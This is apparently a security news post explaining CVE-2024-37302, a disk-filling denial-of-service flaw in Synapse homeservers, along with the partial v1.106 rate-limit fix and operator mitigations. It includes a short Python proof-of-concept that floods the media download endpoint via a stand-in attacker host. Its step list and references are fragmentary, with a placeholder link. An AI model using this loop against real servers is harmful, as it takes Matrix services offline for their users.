CVE CyberSecurity Database News

CVE-2024-37302 - Synapse Homeserver Disk Fill Vulnerability Explained — How Attackers Could Deny Your Matrix Service

Poster -

In June 2024, a new critical vulnerability was discovered in Synapse, the popular open-source Matrix homeserver. Tagged as CVE-2024-37302, this bug gives attackers a free and easy way to fill your server's disk space and possibly take your entire Matrix service offline.

What patches (in v1.106) have changed, and what still needs to be done to be fully secure

By the end, you'll know how to protect your Synapse server — and what more still needs to be done by the community.

---

Affected Versions: All versions before 1.106

- What happens? Any unauthenticated user can trigger Synapse to download *large* remote media files and store them on your server—over and over.
- What is the result? Disk space is quickly consumed; service can crash or become unavailable—a classic Denial of Service (DoS) attack.

Understanding the Synapse Media Cache

Synapse is designed so that when users fetch images, attachments, or avatars from other Matrix homeservers, it caches copies on the local server disk. Normally, this is convenient and makes future requests faster and less bandwidth-heavy.

The problem: The default rate limits and access controls *before* 1.106 do not limit anonymous access to this download-and-cache behavior, and do not track total disk space usage for cached media per user or source.

Connect as an anonymous client

2. Request media from remote locations (could be on remote Matrix servers or even attacker-controlled endpoints)

Repeat 2-3 with lots of unique filenames or oversized files

Since none of these requests require authentication, anyone on the Internet can fill the server’s disk.

Exploit: Python PoC

Below is a simple code snippet that demonstrates what an attack might look like.

import requests

MATRIX_SERVER = "https://target-synapse-server.example.com";
REMOTE_SERVER = "evil-payload.example.com"
MEDIA_ID_LIST = [f"hugefile-{i}" for i in range(100)]  # attackers generate lots of file names

for media_id in MEDIA_ID_LIST:
    url = (
        f"{MATRIX_SERVER}/_matrix/media/v3/download/"
        f"{REMOTE_SERVER}/{media_id}"
    )
    print(f"Requesting: {url}")
    r = requests.get(url)
    # Synapse downloads and caches the file, filling up disk space!

What the attacker does:
- Put large/unique files at the remote server

Why Wasn't This Caught Earlier?

While Synapse had some generic rate limiting, it was *per request*, not per data volume, and did not apply to unauthenticated media download requests from remote sources. Popular use-cases in Matrix (like sharing memes, images) made disabling this cache behavior impractical.

What Did the Patch in v1.106 Change?

Synapse v1.106 introduced a new "leaky bucket" rate limit specifically for remote media downloads. This means:

- There's now a cap on how much data a single user (even unauthenticated) can have downloaded/cached in a given timeframe.
- This slows down attackers, making it less practical to fill the disk quickly — but does *not* entirely prevent the attack, especially determined attackers or botnets.

Excerpt from the changelog

> "Synapse 1.106 introduces a new 'leaky bucket' rate limit on remote media downloads to reduce the amount of data a user can request at a time… does limit an unauthenticated user's ability to request large amounts of data to be cached."

Read more

- Synapse PR 17444 - Media rate limiting
- Security Advisory

Monitor your media cache

Set alerts for disk space consumption in your Matrix data directory (default: /var/lib/synapse/media).

Consider network-level rate limiting

Use firewalls or reverse proxies to restrict access if possible, especially to the /download/ endpoints.

Watch for future updates

This "leaky bucket" is a partial fix; a full solution may require deeper changes in Synapse's caching logic.

What More Needs to Be Done?

Even with Synapse 1.106, a motivated attacker could eventually fill the disk—it just takes longer per user. A true fix likely needs:

Smarter cache eviction policies

Join the conversation on the Matrix dev room for ongoing fixes.

References

- GitHub Security Advisory: CVE-2024-37302 *(update with correct link)*
- Synapse v1.106 Release Notes
- Matrix Synapse Media API Docs
- Matrix.org blog

Conclusion

CVE-2024-37302 is a classic example of how open endpoints and smart caching can be abused in unexpected ways. While Synapse's partial fix limits risk, server operators should upgrade fast, monitor disk use, and look for stronger fixes soon.

*Keep your Matrix homeserver safe!*

*If you found this helpful, share with your Matrix admin friends. Questions or suggestions? Join the discussion on Matrix: #synapse:matrix.org.*

Timeline

Published on: 12/03/2024 17:15:10 UTC